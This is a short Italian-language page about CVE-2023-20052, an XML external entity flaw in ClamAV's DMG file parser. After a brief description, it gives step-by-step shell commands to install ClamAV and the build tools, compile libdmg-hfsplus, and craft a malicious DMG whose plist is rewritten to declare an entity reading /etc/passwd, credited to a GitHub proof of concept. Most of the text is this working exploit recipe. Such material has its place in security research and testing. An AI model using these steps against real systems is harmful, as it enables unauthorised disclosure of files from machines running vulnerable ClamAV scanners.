
CVE-2023-20052 vulnerabilità di fuga di informazioni nel parser di file DMG di ClamAV
Vulnerabilità di fuga di informazioni CVE-2023-20052 nel parser di file DMG di ClamAV
Una vulnerabilità nel parser di file DMG di ClamAV versioni 1.0.0 e precedenti, 0.105.1 e precedenti, e 0.103.7 e precedenti potrebbe consentire a un attaccante remoto non autenticato di accedere a informazioni sensibili su un dispositivo interessato. Questa vulnerabilità è dovuta all'abilitazione della sostituzione delle entità XML, che può provocare un'iniezione di entità esterne XML. Un attaccante potrebbe sfruttare questa vulnerabilità inviando un file DMG appositamente predisposto per essere analizzato da ClamAV su un dispositivo interessato. Uno sfruttamento riuscito potrebbe consentire all'attaccante di far trapelare byte da qualsiasi file che possa essere letto dal processo di scansione di ClamAV.
sudo dpkg -i package-name.deb

sudo apt install -f
mkdir /usr/local/share/clamav
mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf

sudo adduser clamav

sudo chown -R 1002:1003 /usr/local/share/clamav
sudo freshclam



apt-get update
apt-get install -y ca-certificates gnupg wget
echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list
wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -
apt-get update -y
sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus

cd /libdmg-hfsplus
cmake .

make

cp dmg/dmg /bin
sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg


Riferimento: https://github.com/nokn0wthing/CVE-2023-20052